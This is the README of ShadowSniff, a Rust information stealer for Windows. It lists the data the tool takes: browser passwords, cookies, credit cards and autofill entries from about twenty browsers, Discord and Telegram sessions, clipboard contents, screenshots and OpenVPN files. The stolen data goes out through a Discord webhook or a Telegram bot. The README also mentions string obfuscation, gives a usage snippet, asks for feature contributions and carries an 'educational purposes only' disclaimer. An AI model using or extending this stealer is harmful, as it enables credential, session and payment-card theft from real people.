Lightweight information stealer written in Rust, targeting Windows systems. It interacts directly with the Windows API and avoids unnecessary external dependencies, resulting in a compact, efficient, and low-footprint binary. (PoC. For Educational Purposes only)
Made in Russia.
This project is currently under development, and a fully functional version has not been released yet. Features and stability may change. Please consider enabling notifications to stay informed about updates and important announcements.
Despite its lightweight design, ShadowSniff delivers extensive functionality, covering all essential data extraction capabilities for Windows targets.
- Discord webhook
- Telegram bot
| Feature | Chromium (<127, see here) | Gecko |
|---|---|---|
| Supported | Amingo, Torch, Kometa, Orbitum, Epic Private, Cent, Vivaldi, Chromium, Thorium, Opera, Opera GX, 7Star, Chrome SxS, Chrome, Edge, Uran, Yandex, Brave, Atom | Firefox, Librewolf |
| AutoFill | ✅ | ❌ |
| Bookmarks | ✅ | ❌ |
| Cookies | ✅ | ✅ |
| Passwords | ✅ | ❌ |
| Credit cards | ✅ | ❌ |
| Downloads | ✅ | ❌ |
| History | ✅ | ✅ |
- Discord
- Telegram sessions
- Process list
- Clipboard
- Screenshot
- System info
- User info
- OpenVPN
... more
If you'd like the stealer to support additional features, feel free to open an issue here to request the functionality — or implement it yourself.
Feel free to open issues or submit pull requests — all contributions are welcome, whether it's a bug fix, a new feature, or just an idea.
⭐ You can also support the project by starring the repository — it's a small action that makes a big difference!
Thanks for being part of the project ❤️
This stealer is task-based.
Each task can spawn subtasks, but the main task is shadowsniff::SniffTask,
which is responsible for collecting the entire log.
There are also composite tasks that contain other tasks. When started, each task runs in its own thread. A composite task waits for all its subtasks to finish before it completes.
The stealer does not use the Rust standard library.
The utils::path::Path type used in run comes from the crate utils.
Before calling SniffTask::new().run(&base_path), you must call ipinfo::init_ip_info(), otherwise it won't work.
use utils::path::Path;
use ipinfo::init_ip_info;
use shadowsniff::SniffTask;
fn main() {
if !init_ip_info() {
panic!("Failed to initialize IP info");
}
let base_path = Path::new("output");
unsafe {
SniffTask::new().run(&base_path);
}
}This project has been inspired by a variety of open-source infostealers available on GitHub. Many functions and critical paths were adapted from publicly available repositories. The goal was to build something original by learning from and evolving existing work. I’d like to thank everyone whose contributions helped shape this project — with special appreciation to:
- davimiku — for a clean and efficient JSON parser implementation
- CasualX — for compile-time string obfuscation
...and many others whose code, ideas, or techniques helped shape this project — even if only through a single clever line of Rust.
This library is released under the MIT License. See LICENSE file for more information.
This software, known as ShadowSniff, is intended solely for educational and research purposes. It must never be used for malicious purposes, including (but not limited to) unauthorized access, data breaches, or any other harmful or illegal activities.
By using this tool, you accept full responsibility for your actions. Any form of misuse is strictly forbidden. The creator (sqlerrorthing) bears no liability for how the tool is used. It is your sole duty to ensure that your usage complies with all relevant laws and regulations in your area.
The creator (sqlerrorthing) of this tool assumes no responsibility for any damage or legal consequences that may result from its use or misuse. This includes, but is not limited to, any direct, indirect, incidental, consequential, or punitive damages arising from your access to, use of, or inability to use the software.
The creator (sqlerrorthing) will not offer any support, guidance, or assistance in cases involving misuse of this tool. Any inquiries related to malicious or unauthorized activities will be disregarded.
By using this tool, you acknowledge and accept the terms of this disclaimer. If you do not agree with these terms, you must refrain from using the software.